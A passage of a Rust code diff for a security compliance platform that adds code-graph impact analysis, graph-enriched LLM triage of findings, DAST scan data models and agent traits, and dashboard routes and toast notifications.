.await?;
// dast_targets: index on repo_id
self.dast_targets()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1 })
.build(),
)
.await?;
// dast_scan_runs: compound (target_id, started_at DESC)
self.dast_scan_runs()
.create_index(
IndexModel::builder()
.keys(doc! { "target_id": 1, "started_at": -1 })
.build(),
)
.await?;
// dast_findings: compound (scan_run_id, vuln_type)
self.dast_findings()
.create_index(
IndexModel::builder()
.keys(doc! { "scan_run_id": 1, "vuln_type": 1 })
.build(),
)
.await?;
tracing::info!("Database indexes ensured");
Ok(())
}
@@ -116,8 +180,43 @@ impl Database {
self.inner.collection("tracker_issues")
}
// Graph collections
pub fn graph_nodes(&self) -> Collection<compliance_core::models::graph::CodeNode> {
self.inner.collection("graph_nodes")
}
pub fn graph_edges(&self) -> Collection<compliance_core::models::graph::CodeEdge> {
self.inner.collection("graph_edges")
}
pub fn graph_builds(&self) -> Collection<compliance_core::models::graph::GraphBuildRun> {
self.inner.collection("graph_builds")
}
pub fn impact_analyses(&self) -> Collection<compliance_core::models::graph::ImpactAnalysis> {
self.inner.collection("impact_analyses")
}
// DAST collections
pub fn dast_targets(&self) -> Collection<DastTarget> {
self.inner.collection("dast_targets")
}
pub fn dast_scan_runs(&self) -> Collection<DastScanRun> {
self.inner.collection("dast_scan_runs")
}
pub fn dast_findings(&self) -> Collection<DastFinding> {
self.inner.collection("dast_findings")
}
#[allow(dead_code)]
pub fn raw_collection(&self, name: &str) -> Collection<mongodb::bson::Document> {
self.inner.collection(name)
}
/// Get the raw MongoDB database handle (for graph persistence)
pub fn inner(&self) -> &mongodb::Database {
&self.inner
}
}

View File

@@ -3,6 +3,7 @@ use std::sync::Arc;
use compliance_core::models::{Finding, FindingStatus};
use crate::llm::LlmClient;
use crate::pipeline::orchestrator::GraphContext;
const TRIAGE_SYSTEM_PROMPT: &str = r#"You are a security finding triage expert. Analyze the following security finding and determine:
1. Is this a true positive? (yes/no)
@@ -12,11 +13,15 @@ const TRIAGE_SYSTEM_PROMPT: &str = r#"You are a security finding triage expert.
Respond in JSON format:
{"true_positive": true/false, "confidence": N, "remediation": "..."}"#;
pub async fn triage_findings(llm: &Arc<LlmClient>, findings: &mut Vec<Finding>) -> usize {
pub async fn triage_findings(
llm: &Arc<LlmClient>,
findings: &mut Vec<Finding>,
graph_context: Option<&GraphContext>,
) -> usize {
let mut passed = 0;
for finding in findings.iter_mut() {
let user_prompt = format!(
let mut user_prompt = format!(
"Scanner: {}\nRule: {}\nSeverity: {}\nTitle: {}\nDescription: {}\nFile: {}\nLine: {}\nCode: {}",
finding.scanner,
finding.rule_id.as_deref().unwrap_or("N/A"),
@@ -28,6 +33,37 @@ pub async fn triage_findings(llm: &Arc<LlmClient>, findings: &mut Vec<Finding>)
finding.code_snippet.as_deref().unwrap_or("N/A"),
);
// Enrich with graph context if available
if let Some(ctx) = graph_context {
if let Some(impact) = ctx
.impacts
.iter()
.find(|i| i.finding_id == finding.fingerprint)
{
user_prompt.push_str(&format!(
"\n\n--- Code Graph Context ---\n\
Blast radius: {} nodes affected\n\
Entry points affected: {}\n\
Direct callers: {}\n\
Communities affected: {}\n\
Call chains: {}",
impact.blast_radius,
if impact.affected_entry_points.is_empty() {
"none".to_string()
} else {
impact.affected_entry_points.join(", ")
},
if impact.direct_callers.is_empty() {
"none".to_string()
} else {
impact.direct_callers.join(", ")
},
impact.affected_communities.len(),
impact.call_chains.len(),
));
}
}
match llm
.chat(TRIAGE_SYSTEM_PROMPT, &user_prompt, Some(0.1))
.await

View File

@@ -15,6 +15,16 @@ use crate::pipeline::patterns::{GdprPatternScanner, OAuthPatternScanner};
use crate::pipeline::sbom::SbomScanner;
use crate::pipeline::semgrep::SemgrepScanner;
/// Context from graph analysis passed to LLM triage for enhanced filtering
#[derive(Debug)]
#[allow(dead_code)]
pub struct GraphContext {
pub node_count: u32,
pub edge_count: u32,
pub community_count: u32,
pub impacts: Vec<compliance_core::models::graph::ImpactAnalysis>,
}
pub struct PipelineOrchestrator {
config: AgentConfig,
db: Database,
@@ -172,13 +182,30 @@ impl PipelineOrchestrator {
Err(e) => tracing::warn!("[{repo_id}] OAuth pattern scan failed: {e}"),
}
// Stage 5: LLM Triage
// Stage 4.5: Graph Building
tracing::info!("[{repo_id}] Stage 4.5: Graph Building");
self.update_phase(scan_run_id, "graph_building").await;
let graph_context = match self.build_code_graph(&repo_path, &repo_id, &all_findings).await
{
Ok(ctx) => Some(ctx),
Err(e) => {
tracing::warn!("[{repo_id}] Graph building failed: {e}");
None
}
};
// Stage 5: LLM Triage (enhanced with graph context)
tracing::info!(
"[{repo_id}] Stage 5: LLM Triage ({} findings)",
all_findings.len()
);
self.update_phase(scan_run_id, "llm_triage").await;
let triaged = crate::llm::triage::triage_findings(&self.llm, &mut all_findings).await;
let triaged = crate::llm::triage::triage_findings(
&self.llm,
&mut all_findings,
graph_context.as_ref(),
)
.await;
tracing::info!("[{repo_id}] Triaged: {triaged} findings passed confidence threshold");
// Dedup against existing findings and insert new ones
@@ -250,10 +277,121 @@ impl PipelineOrchestrator {
)
.await?;
// Stage 8: DAST (async, optional — only if a DastTarget is configured)
tracing::info!("[{repo_id}] Stage 8: Checking for DAST targets");
self.update_phase(scan_run_id, "dast_scanning").await;
self.maybe_trigger_dast(&repo_id, scan_run_id).await;
tracing::info!("[{repo_id}] Scan complete: {new_count} new findings");
Ok(new_count)
}
/// Build the code knowledge graph for a repo and compute impact analyses
async fn build_code_graph(
&self,
repo_path: &std::path::Path,
repo_id: &str,
findings: &[Finding],
) -> Result<GraphContext, AgentError> {
let graph_build_id = uuid::Uuid::new_v4().to_string();
let engine = compliance_graph::GraphEngine::new(50_000);
let (mut code_graph, build_run) = engine
.build_graph(repo_path, repo_id, &graph_build_id)
.map_err(|e| AgentError::Other(format!("Graph build error: {e}")))?;
// Apply community detection
compliance_graph::graph::community::apply_communities(&mut code_graph);
// Store graph in MongoDB
let store = compliance_graph::graph::persistence::GraphStore::new(self.db.inner());
store
.delete_repo_graph(repo_id)
.await
.map_err(|e| AgentError::Other(format!("Graph cleanup error: {e}")))?;
store
.store_graph(&build_run, &code_graph.nodes, &code_graph.edges)
.await
.map_err(|e| AgentError::Other(format!("Graph store error: {e}")))?;
// Compute impact analysis for each finding
let analyzer = compliance_graph::GraphEngine::impact_analyzer(&code_graph);
let mut impacts = Vec::new();
for finding in findings {
if let Some(file_path) = &finding.file_path {
let impact = analyzer.analyze(
repo_id,
&finding.fingerprint,
&graph_build_id,
file_path,
finding.line_number,
);
store
.store_impact(&impact)
.await
.map_err(|e| AgentError::Other(format!("Impact store error: {e}")))?;
impacts.push(impact);
}
}
Ok(GraphContext {
node_count: build_run.node_count,
edge_count: build_run.edge_count,
community_count: build_run.community_count,
impacts,
})
}
/// Trigger DAST scan if a target is configured for this repo
async fn maybe_trigger_dast(&self, repo_id: &str, scan_run_id: &str) {
use futures_util::TryStreamExt;
let filter = mongodb::bson::doc! { "repo_id": repo_id };
let targets: Vec<compliance_core::models::DastTarget> = match self
.db
.dast_targets()
.find(filter)
.await
{
Ok(cursor) => cursor.try_collect().await.unwrap_or_default(),
Err(_) => return,
};
if targets.is_empty() {
tracing::info!("[{repo_id}] No DAST targets configured, skipping");
return;
}
for target in targets {
let db = self.db.clone();
let scan_run_id = scan_run_id.to_string();
tokio::spawn(async move {
let orchestrator = compliance_dast::DastOrchestrator::new(100);
match orchestrator.run_scan(&target, Vec::new()).await {
Ok((mut scan_run, findings)) => {
scan_run.sast_scan_run_id = Some(scan_run_id);
if let Err(e) = db.dast_scan_runs().insert_one(&scan_run).await {
tracing::error!("Failed to store DAST scan run: {e}");
}
for finding in &findings {
if let Err(e) = db.dast_findings().insert_one(finding).await {
tracing::error!("Failed to store DAST finding: {e}");
}
}
tracing::info!(
"DAST scan complete: {} findings",
findings.len()
);
}
Err(e) => {
tracing::error!("DAST scan failed: {e}");
}
}
});
}
}
async fn update_phase(&self, scan_run_id: &str, phase: &str) {
if let Ok(oid) = mongodb::bson::oid::ObjectId::parse_str(scan_run_id) {
let _ = self

View File

@@ -19,5 +19,5 @@ sha2 = { workspace = true }
hex = { workspace = true }
uuid = { workspace = true }
secrecy = { workspace = true }
bson = "2"
bson = { version = "2", features = ["chrono-0_4"] }
mongodb = { workspace = true, optional = true }

View File

@@ -38,6 +38,12 @@ pub enum CoreError {
#[error("IO error: {0}")]
Io(#[from] std::io::Error),
#[error("Graph error: {0}")]
Graph(String),
#[error("DAST error: {0}")]
Dast(String),
#[error("Not found: {0}")]
NotFound(String),

View File

@@ -0,0 +1,276 @@
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use super::finding::Severity;
/// Type of DAST target application
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastTargetType {
WebApp,
RestApi,
GraphQl,
}
impl std::fmt::Display for DastTargetType {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::WebApp => write!(f, "webapp"),
Self::RestApi => write!(f, "rest_api"),
Self::GraphQl => write!(f, "graphql"),
}
}
}
/// Authentication configuration for DAST target
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastAuthConfig {
/// Authentication method: "none", "basic", "bearer", "cookie", "form"
pub method: String,
/// Login URL for form-based auth
pub login_url: Option<String>,
/// Username or token
pub username: Option<String>,
/// Password (stored encrypted in practice)
pub password: Option<String>,
/// Bearer token
pub token: Option<String>,
/// Custom headers for auth
pub headers: Option<std::collections::HashMap<String, String>>,
}
/// A target for DAST scanning
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastTarget {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub name: String,
pub base_url: String,
pub target_type: DastTargetType,
pub auth_config: Option<DastAuthConfig>,
/// Linked repository ID (for SAST correlation)
pub repo_id: Option<String>,
/// URL paths to exclude from scanning
pub excluded_paths: Vec<String>,
/// Maximum crawl depth
pub max_crawl_depth: u32,
/// Rate limit (requests per second)
pub rate_limit: u32,
/// Whether destructive tests (DELETE, PUT) are allowed
pub allow_destructive: bool,
pub created_at: DateTime<Utc>,
pub updated_at: DateTime<Utc>,
}
impl DastTarget {
pub fn new(name: String, base_url: String, target_type: DastTargetType) -> Self {
let now = Utc::now();
Self {
id: None,
name,
base_url,
target_type,
auth_config: None,
repo_id: None,
excluded_paths: Vec::new(),
max_crawl_depth: 5,
rate_limit: 10,
allow_destructive: false,
created_at: now,
updated_at: now,
}
}
}
/// Phase of a DAST scan
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastScanPhase {
Reconnaissance,
Crawling,
VulnerabilityAnalysis,
Exploitation,
Reporting,
Completed,
}
impl std::fmt::Display for DastScanPhase {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Reconnaissance => write!(f, "reconnaissance"),
Self::Crawling => write!(f, "crawling"),
Self::VulnerabilityAnalysis => write!(f, "vulnerability_analysis"),
Self::Exploitation => write!(f, "exploitation"),
Self::Reporting => write!(f, "reporting"),
Self::Completed => write!(f, "completed"),
}
}
}
/// Status of a DAST scan run
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastScanStatus {
Running,
Completed,
Failed,
Cancelled,
}
/// A DAST scan run
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastScanRun {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub target_id: String,
pub status: DastScanStatus,
pub current_phase: DastScanPhase,
pub phases_completed: Vec<DastScanPhase>,
/// Number of endpoints discovered during crawling
pub endpoints_discovered: u32,
/// Number of findings
pub findings_count: u32,
/// Number of confirmed exploitable findings
pub exploitable_count: u32,
pub error_message: Option<String>,
/// Linked SAST scan run ID (if triggered as part of pipeline)
pub sast_scan_run_id: Option<String>,
pub started_at: DateTime<Utc>,
pub completed_at: Option<DateTime<Utc>>,
}
impl DastScanRun {
pub fn new(target_id: String) -> Self {
Self {
id: None,
target_id,
status: DastScanStatus::Running,
current_phase: DastScanPhase::Reconnaissance,
phases_completed: Vec::new(),
endpoints_discovered: 0,
findings_count: 0,
exploitable_count: 0,
error_message: None,
sast_scan_run_id: None,
started_at: Utc::now(),
completed_at: None,
}
}
}
/// Type of DAST vulnerability
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastVulnType {
SqlInjection,
Xss,
AuthBypass,
Ssrf,
ApiMisconfiguration,
OpenRedirect,
Idor,
InformationDisclosure,
SecurityMisconfiguration,
BrokenAuth,
Other,
}
impl std::fmt::Display for DastVulnType {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::SqlInjection => write!(f, "sql_injection"),
Self::Xss => write!(f, "xss"),
Self::AuthBypass => write!(f, "auth_bypass"),
Self::Ssrf => write!(f, "ssrf"),
Self::ApiMisconfiguration => write!(f, "api_misconfiguration"),
Self::OpenRedirect => write!(f, "open_redirect"),
Self::Idor => write!(f, "idor"),
Self::InformationDisclosure => write!(f, "information_disclosure"),
Self::SecurityMisconfiguration => write!(f, "security_misconfiguration"),
Self::BrokenAuth => write!(f, "broken_auth"),
Self::Other => write!(f, "other"),
}
}
}
/// Evidence collected during DAST testing
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastEvidence {
/// HTTP request that triggered the finding
pub request_method: String,
pub request_url: String,
pub request_headers: Option<std::collections::HashMap<String, String>>,
pub request_body: Option<String>,
/// HTTP response
pub response_status: u16,
pub response_headers: Option<std::collections::HashMap<String, String>>,
/// Relevant snippet of response body
pub response_snippet: Option<String>,
/// Path to screenshot file (if captured)
pub screenshot_path: Option<String>,
/// The payload that triggered the vulnerability
pub payload: Option<String>,
/// Timing information (for timing-based attacks)
pub response_time_ms: Option<u64>,
}
/// A finding from DAST scanning
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastFinding {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub scan_run_id: String,
pub target_id: String,
pub vuln_type: DastVulnType,
pub title: String,
pub description: String,
pub severity: Severity,
pub cwe: Option<String>,
/// The URL endpoint where the vulnerability was found
pub endpoint: String,
/// HTTP method
pub method: String,
/// Parameter that is vulnerable
pub parameter: Option<String>,
/// Whether exploitability was confirmed with a working payload
pub exploitable: bool,
/// Evidence chain
pub evidence: Vec<DastEvidence>,
/// Remediation guidance
pub remediation: Option<String>,
/// Linked SAST finding ID (if correlated)
pub linked_sast_finding_id: Option<String>,
pub created_at: DateTime<Utc>,
}
impl DastFinding {
pub fn new(
scan_run_id: String,
target_id: String,
vuln_type: DastVulnType,
title: String,
description: String,
severity: Severity,
endpoint: String,
method: String,
) -> Self {
Self {
id: None,
scan_run_id,
target_id,
vuln_type,
title,
description,
severity,
cwe: None,
endpoint,
method,
parameter: None,
exploitable: false,
evidence: Vec::new(),
remediation: None,
linked_sast_finding_id: None,
created_at: Utc::now(),
}
}
}

View File

@@ -0,0 +1,186 @@
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
/// Type of code node in the knowledge graph
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Hash)]
#[serde(rename_all = "snake_case")]
pub enum CodeNodeKind {
Function,
Method,
Class,
Struct,
Enum,
Interface,
Trait,
Module,
File,
}
impl std::fmt::Display for CodeNodeKind {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Function => write!(f, "function"),
Self::Method => write!(f, "method"),
Self::Class => write!(f, "class"),
Self::Struct => write!(f, "struct"),
Self::Enum => write!(f, "enum"),
Self::Interface => write!(f, "interface"),
Self::Trait => write!(f, "trait"),
Self::Module => write!(f, "module"),
Self::File => write!(f, "file"),
}
}
}
/// A node in the code knowledge graph
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CodeNode {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub graph_build_id: String,
/// Unique identifier within the graph (e.g., "src/main.rs::main")
pub qualified_name: String,
pub name: String,
pub kind: CodeNodeKind,
pub file_path: String,
pub start_line: u32,
pub end_line: u32,
/// Language of the source file
pub language: String,
/// Community ID from Louvain clustering
pub community_id: Option<u32>,
/// Whether this is a public entry point (main, exported fn, HTTP handler, etc.)
pub is_entry_point: bool,
/// Internal petgraph node index for fast lookups
#[serde(skip_serializing_if = "Option::is_none")]
pub graph_index: Option<u32>,
}
/// Type of relationship between code nodes
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Hash)]
#[serde(rename_all = "snake_case")]
pub enum CodeEdgeKind {
Calls,
Imports,
Inherits,
Implements,
Contains,
/// A type reference (e.g., function parameter type, return type)
TypeRef,
}
impl std::fmt::Display for CodeEdgeKind {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Calls => write!(f, "calls"),
Self::Imports => write!(f, "imports"),
Self::Inherits => write!(f, "inherits"),
Self::Implements => write!(f, "implements"),
Self::Contains => write!(f, "contains"),
Self::TypeRef => write!(f, "type_ref"),
}
}
}
/// An edge in the code knowledge graph
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CodeEdge {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub graph_build_id: String,
/// Qualified name of source node
pub source: String,
/// Qualified name of target node
pub target: String,
pub kind: CodeEdgeKind,
/// File where this relationship was found
pub file_path: String,
pub line_number: Option<u32>,
}
/// Status of a graph build operation
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum GraphBuildStatus {
Running,
Completed,
Failed,
}
/// Tracks a graph build operation for a repo/commit
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct GraphBuildRun {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub commit_sha: Option<String>,
pub status: GraphBuildStatus,
pub node_count: u32,
pub edge_count: u32,
pub community_count: u32,
pub languages_parsed: Vec<String>,
pub error_message: Option<String>,
pub started_at: DateTime<Utc>,
pub completed_at: Option<DateTime<Utc>>,
}
impl GraphBuildRun {
pub fn new(repo_id: String) -> Self {
Self {
id: None,
repo_id,
commit_sha: None,
status: GraphBuildStatus::Running,
node_count: 0,
edge_count: 0,
community_count: 0,
languages_parsed: Vec::new(),
error_message: None,
started_at: Utc::now(),
completed_at: None,
}
}
}
/// Impact analysis result for a finding
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ImpactAnalysis {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub finding_id: String,
pub graph_build_id: String,
/// Number of nodes reachable from the finding location
pub blast_radius: u32,
/// Entry points affected by this finding (via reverse call chain)
pub affected_entry_points: Vec<String>,
/// Call chains from entry points to the finding location
pub call_chains: Vec<Vec<String>>,
/// Community IDs affected
pub affected_communities: Vec<u32>,
/// Direct callers of the affected function
pub direct_callers: Vec<String>,
/// Direct callees of the affected function
pub direct_callees: Vec<String>,
pub created_at: DateTime<Utc>,
}
impl ImpactAnalysis {
pub fn new(repo_id: String, finding_id: String, graph_build_id: String) -> Self {
Self {
id: None,
repo_id,
finding_id,
graph_build_id,
blast_radius: 0,
affected_entry_points: Vec::new(),
call_chains: Vec::new(),
affected_communities: Vec::new(),
direct_callers: Vec::new(),
direct_callees: Vec::new(),
created_at: Utc::now(),
}
}
}

View File

@@ -1,12 +1,22 @@
pub mod cve;
pub mod dast;
pub mod finding;
pub mod graph;
pub mod issue;
pub mod repository;
pub mod sbom;
pub mod scan;
pub use cve::{CveAlert, CveSource};
pub use dast::{
DastAuthConfig, DastEvidence, DastFinding, DastScanPhase, DastScanRun, DastScanStatus,
DastTarget, DastTargetType, DastVulnType,
};
pub use finding::{Finding, FindingStatus, Severity};
pub use graph::{
CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind, GraphBuildRun, GraphBuildStatus,
ImpactAnalysis,
};
pub use issue::{IssueStatus, TrackerIssue, TrackerType};
pub use repository::{ScanTrigger, TrackedRepository};
pub use sbom::{SbomEntry, VulnRef};

View File

@@ -1,5 +1,5 @@
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use serde::{Deserialize, Deserializer, Serialize};
use super::issue::TrackerType;
@@ -15,21 +15,64 @@ pub enum ScanTrigger {
pub struct TrackedRepository {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
#[serde(default)]
pub name: String,
#[serde(default)]
pub git_url: String,
#[serde(default = "default_branch")]
pub default_branch: String,
pub local_path: Option<String>,
pub scan_schedule: Option<String>,
#[serde(default)]
pub webhook_enabled: bool,
pub tracker_type: Option<TrackerType>,
pub tracker_owner: Option<String>,
pub tracker_repo: Option<String>,
pub last_scanned_commit: Option<String>,
#[serde(default, deserialize_with = "deserialize_findings_count")]
pub findings_count: u32,
#[serde(default = "chrono::Utc::now", deserialize_with = "deserialize_datetime")]
pub created_at: DateTime<Utc>,
#[serde(default = "chrono::Utc::now", deserialize_with = "deserialize_datetime")]
pub updated_at: DateTime<Utc>,
}
fn default_branch() -> String {
"main".to_string()
}
/// Handles findings_count stored as either a plain integer or a BSON Int64
/// which the driver may present as a map `{"low": N, "high": N, "unsigned": bool}`.
/// Handles datetime stored as either a BSON DateTime or an RFC 3339 string.
fn deserialize_datetime<'de, D>(deserializer: D) -> Result<DateTime<Utc>, D::Error>
where
D: Deserializer<'de>,
{
let bson = bson::Bson::deserialize(deserializer)?;
match bson {
bson::Bson::DateTime(dt) => Ok(dt.into()),
bson::Bson::String(s) => s
.parse::<DateTime<Utc>>()
.map_err(serde::de::Error::custom),
other => Err(serde::de::Error::custom(format!(
"expected DateTime or string, got: {other:?}"
))),
}
}
fn deserialize_findings_count<'de, D>(deserializer: D) -> Result<u32, D::Error>
where
D: Deserializer<'de>,
{
let bson = bson::Bson::deserialize(deserializer)?;
match &bson {
bson::Bson::Int32(n) => Ok(*n as u32),
bson::Bson::Int64(n) => Ok(*n as u32),
bson::Bson::Double(n) => Ok(*n as u32),
_ => Ok(0),
}
}
impl TrackedRepository {
pub fn new(name: String, git_url: String) -> Self {
let now = Utc::now();

View File

@@ -11,6 +11,8 @@ pub enum ScanType {
Cve,
Gdpr,
OAuth,
Graph,
Dast,
}
impl std::fmt::Display for ScanType {
@@ -21,6 +23,8 @@ impl std::fmt::Display for ScanType {
Self::Cve => write!(f, "cve"),
Self::Gdpr => write!(f, "gdpr"),
Self::OAuth => write!(f, "oauth"),
Self::Graph => write!(f, "graph"),
Self::Dast => write!(f, "dast"),
}
}
}
@@ -41,8 +45,10 @@ pub enum ScanPhase {
SbomGeneration,
CveScanning,
PatternScanning,
GraphBuilding,
LlmTriage,
IssueCreation,
DastScanning,
Completed,
}

View File

@@ -0,0 +1,47 @@
use crate::error::CoreError;
use crate::models::dast::{DastFinding, DastTarget};
/// Context passed to DAST agents containing discovered information
#[derive(Debug, Clone, Default)]
pub struct DastContext {
/// Discovered endpoints from crawling
pub endpoints: Vec<DiscoveredEndpoint>,
/// Technologies detected during recon
pub technologies: Vec<String>,
/// Existing SAST findings for prioritization
pub sast_hints: Vec<String>,
}
/// An endpoint discovered during crawling
#[derive(Debug, Clone)]
pub struct DiscoveredEndpoint {
pub url: String,
pub method: String,
pub parameters: Vec<EndpointParameter>,
pub content_type: Option<String>,
pub requires_auth: bool,
}
/// A parameter on a discovered endpoint
#[derive(Debug, Clone)]
pub struct EndpointParameter {
pub name: String,
/// "query", "body", "header", "path", "cookie"
pub location: String,
pub param_type: Option<String>,
pub example_value: Option<String>,
}
/// Trait for DAST testing agents (injection, XSS, auth bypass, etc.)
#[allow(async_fn_in_trait)]
pub trait DastAgent: Send + Sync {
/// Agent name (e.g., "sql_injection", "xss", "auth_bypass")
fn name(&self) -> &str;
/// Run the agent against a target with discovered context
async fn run(
&self,
target: &DastTarget,
context: &DastContext,
) -> Result<Vec<DastFinding>, CoreError>;
}

View File

@@ -0,0 +1,30 @@
use std::path::Path;
use crate::error::CoreError;
use crate::models::graph::{CodeEdge, CodeNode};
/// Output from parsing a single file
#[derive(Debug, Default)]
pub struct ParseOutput {
pub nodes: Vec<CodeNode>,
pub edges: Vec<CodeEdge>,
}
/// Trait for language-specific code parsers
#[allow(async_fn_in_trait)]
pub trait LanguageParser: Send + Sync {
/// Language name (e.g., "rust", "python", "javascript")
fn language(&self) -> &str;
/// File extensions this parser handles
fn extensions(&self) -> &[&str];
/// Parse a single file and extract nodes + edges
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError>;
}

View File

@@ -1,5 +1,9 @@
pub mod dast_agent;
pub mod graph_builder;
pub mod issue_tracker;
pub mod scanner;
pub use dast_agent::{DastAgent, DastContext, DiscoveredEndpoint, EndpointParameter};
pub use graph_builder::{LanguageParser, ParseOutput};
pub use issue_tracker::IssueTracker;
pub use scanner::{ScanOutput, Scanner};

View File

@@ -12,7 +12,7 @@ path = "../bin/main.rs"
workspace = true
[features]
web = ["dioxus/web", "dioxus/router", "dioxus/fullstack", "dep:web-sys"]
web = ["dioxus/web", "dioxus/router", "dioxus/fullstack", "dep:web-sys", "dep:gloo-timers"]
server = [
"dioxus/server",
"dioxus/router",
@@ -43,6 +43,7 @@ thiserror = { workspace = true }
# Web-only
reqwest = { workspace = true, optional = true }
web-sys = { version = "0.3", optional = true }
gloo-timers = { version = "0.3", features = ["futures"], optional = true }
# Server-only
axum = { version = "0.8", optional = true }

View File

@@ -300,6 +300,87 @@ tr:hover {
color: var(--text-secondary);
}
/* Toast notifications */
.toast-container {
position: fixed;
top: 20px;
right: 20px;
z-index: 50;
display: flex;
flex-direction: column;
gap: 8px;
pointer-events: none;
}
.toast {
display: flex;
align-items: center;
justify-content: space-between;
gap: 12px;
min-width: 280px;
max-width: 420px;
padding: 12px 16px;
border-radius: 8px;
font-size: 14px;
font-weight: 500;
pointer-events: auto;
animation: toast-in 0.3s ease-out;
}
.toast-success {
background: rgba(34, 197, 94, 0.15);
border: 1px solid var(--success);
color: #86efac;
}
.toast-error {
background: rgba(239, 68, 68, 0.15);
border: 1px solid var(--danger);
color: #fca5a5;
}
.toast-info {
background: rgba(59, 130, 246, 0.15);
border: 1px solid var(--info);
color: #93c5fd;
}
.toast-dismiss {
background: none;
border: none;
color: inherit;
font-size: 18px;
cursor: pointer;
opacity: 0.7;
padding: 0 4px;
line-height: 1;
}
.toast-dismiss:hover {
opacity: 1;
}
@keyframes toast-in {
from {
transform: translateX(100%);
opacity: 0;
}
to {
transform: translateX(0);
opacity: 1;
}
}
/* Button click animation + disabled */
.btn:active {
transform: scale(0.95);
}
.btn:disabled {
opacity: 0.6;
cursor: not-allowed;
}
@media (max-width: 768px) {
.sidebar {
transform: translateX(-100%);

View File

@@ -20,6 +20,20 @@ pub enum Route {
SbomPage {},
#[route("/issues")]
IssuesPage {},
#[route("/graph")]
GraphIndexPage {},
#[route("/graph/:repo_id")]
GraphExplorerPage { repo_id: String },
#[route("/graph/:repo_id/impact/:finding_id")]
ImpactAnalysisPage { repo_id: String, finding_id: String },
#[route("/dast")]
DastOverviewPage {},
#[route("/dast/targets")]
DastTargetsPage {},
#[route("/dast/findings")]
DastFindingsPage {},
#[route("/dast/findings/:id")]
DastFindingDetailPage { id: String },
#[route("/settings")]
SettingsPage {},
}

View File

@@ -2,15 +2,18 @@ use dioxus::prelude::*;
use crate::app::Route;
use crate::components::sidebar::Sidebar;
use crate::components::toast::{ToastContainer, Toasts};
#[component]
pub fn AppShell() -> Element {
use_context_provider(Toasts::new);
rsx! {
div { class: "app-shell",
Sidebar {}
main { class: "main-content",
Outlet::<Route> {}
}
ToastContainer {}
}
}
}

View File

@@ -5,3 +5,4 @@ pub mod pagination;
pub mod severity_badge;
pub mod sidebar;
pub mod stat_card;
pub mod toast;

View File

@@ -40,6 +40,16 @@ pub fn Sidebar() -> Element {
route: Route::IssuesPage {},
icon: rsx! { Icon { icon: BsListTask, width: 18, height: 18 } },
},
NavItem {
label: "Code Graph",
route: Route::GraphIndexPage {},
icon: rsx! { Icon { icon: BsDiagram3, width: 18, height: 18 } },
},
NavItem {
label: "DAST",
route: Route::DastOverviewPage {},
icon: rsx! { Icon { icon: BsBug, width: 18, height: 18 } },
},
NavItem {
label: "Settings",
route: Route::SettingsPage {},
@@ -58,6 +68,12 @@ pub fn Sidebar() -> Element {
{
let is_active = match (&current_route, &item.route) {
(Route::FindingDetailPage { .. }, Route::FindingsPage {}) => true,
(Route::GraphIndexPage {}, Route::GraphIndexPage {}) => true,
(Route::GraphExplorerPage { .. }, Route::GraphIndexPage {}) => true,
(Route::ImpactAnalysisPage { .. }, Route::GraphIndexPage {}) => true,
(Route::DastTargetsPage {}, Route::DastOverviewPage {}) => true,
(Route::DastFindingsPage {}, Route::DastOverviewPage {}) => true,
(Route::DastFindingDetailPage { .. }, Route::DastOverviewPage {}) => true,
(a, b) => a == b,
};
let class = if is_active { "nav-item active" } else { "nav-item" };

View File

@@ -0,0 +1,86 @@
use dioxus::prelude::*;
#[derive(Clone, PartialEq)]
pub enum ToastType {
Success,
Error,
Info,
}
#[derive(Clone, PartialEq)]
pub struct ToastMessage {
pub id: usize,
pub message: String,
